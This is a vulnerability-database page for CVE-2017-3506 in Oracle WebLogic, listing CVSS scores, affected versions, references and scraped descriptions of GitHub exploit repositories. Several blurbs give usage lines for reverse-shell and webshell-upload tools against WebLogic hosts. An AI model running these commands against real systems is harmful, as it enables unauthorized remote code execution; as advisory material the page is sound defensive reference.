Published: 24/04/2017 Updated: 03/10/2019

CVSS v2 Base Score: 5.8 | Impact Score: 4.9 | Exploitability Score: 8.6

CVSS v3 Base Score: 7.4 | Impact Score: 5.2 | Exploitability Score: 2.2

VMScore: 519

Vector: AV:N/AC:M/Au:N/C:P/I:P/A:N

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).

Vulnerable Product	Search on Vulmon	Subscribe to Product
oracle weblogic server 12.2.1.0.0
oracle weblogic server 12.2.1.2.0
oracle weblogic server 12.2.1.1.0
oracle weblogic server 12.1.3.0.0
oracle weblogic server 10.3.6.0.0

自己学习java安全的一些总结，主要是安全审计相关

javasec 这是我在学习java安全审计的一些总结，每篇文章可能都不会很长，可能就只是讲一个知识点，但是文章越短，我才越容易坚持下去把这系列文章写完～本系列文章不求把每个细节都覆盖到，但求把提到的每个知识点用通俗易懂的话阐述出来文章体系规划(待完善）： JAVA反射机制

a tools for erp penetration testing

ERPSCAN EBS Pentesting tool ERPScan_EBS_Pentesting_Toolpy This is ERPSCAN EBS Pentesting tool for ERPScan site It is a wrapper for ERPSCAN EBS checking modules There are 4 main modules (1 module uses EBS Users' passwords decryptor ebsDecryptpy): EBS DB Users Brute-force (dbUsersBforcepy), EBS Users Brute-force (ebsUsersBforcepy), EBS Java Serialization test (javaS

Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)

CVE-2017-10271 Weblogic wls-wsat Component Deserialization Vulnerability (CVE-2017-10271) Detection and Exploitation Script Usage $ python CVE-2017-10271py -l 10101010 -p 4444 -r willbepwnedcom:7001/ Features Standalone Python script Check functionality to see if any host is vulnerable Exploit functionality for Linux targets

weblogic XMLDecoder反序列化漏洞利用工具

XMLDecoder_unser weblogic XMLDecoder反序列化漏洞利用工具主要针对漏洞CVE-2017-3506和CVE-2017-10271

Oracle-WebLogic-CVE-2017-10271

WebLogic Wls-wsat XMLDecoder 漏洞描述 mitre:cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2017-3506 早期，黑客利用WebLogic WLS 组件漏洞对企业服务器发起大范围远程攻击，有大量企业的服务器被攻陷，且被攻击企业数量呈现明显上升趋势，需要引起高度重视。其中，CVE-2017-3506是一个利用Oracle WebLogic中WLS �

Weblogic XMLDecoder系列漏洞POC

Weblogic-XMLDecoder-POC Weblogic XMLDecoder系列漏洞POC 漏洞版本 CVE-2017-3506 CVE-2017-10271 CVE-2019-2725 CVE-2017-3506 项目中poc/2017-3506目录下存了两个poc： poc1xml : 执行命令，在/tmp目录下生成diggid文件，需要进docker里面验证 poc2xml : 反弹shell，需要外连 CVE-2017-10271 同3506 CVE-2019-2725 项目中poc/2019-2725目录�

WebLogic Insecure Deserialization - CVE-2019-2725 payload builder & exploit

CVE-2019-2725 WebLogic Universal Exploit - CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 payload builder & exploit Info / Help $ python3 weblogic_exploitpy -h ======================================================================== | WebLogic Universal Exploit | | CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2

Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)

CVE-2017-3506

What is this? This is a poc of CVE-2017-3506(Weblogic XMLDecoder Serialization) How to use it? check vul java -jar WebLogic-XMLDecoderjar -u 192168174144:7001 GetShell java -jar WebLogic-XMLDecoderjar -s 192168174144:7001 /wls-wsat/CoordinatorPortType11 shelljsp Then you can

NVD-CWE-noinfo http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html http://www.securityfocus.com/bid/97884 http://www.securitytracker.com/id/1038296 https://nvd.nist.gov https://github.com/Maskhe/javasec

Get Started

CVE-2017-3506

Vulnerability Summary

Vulnerability Trend

Github Repositories

References

Vulmon Search

About

Products

Connect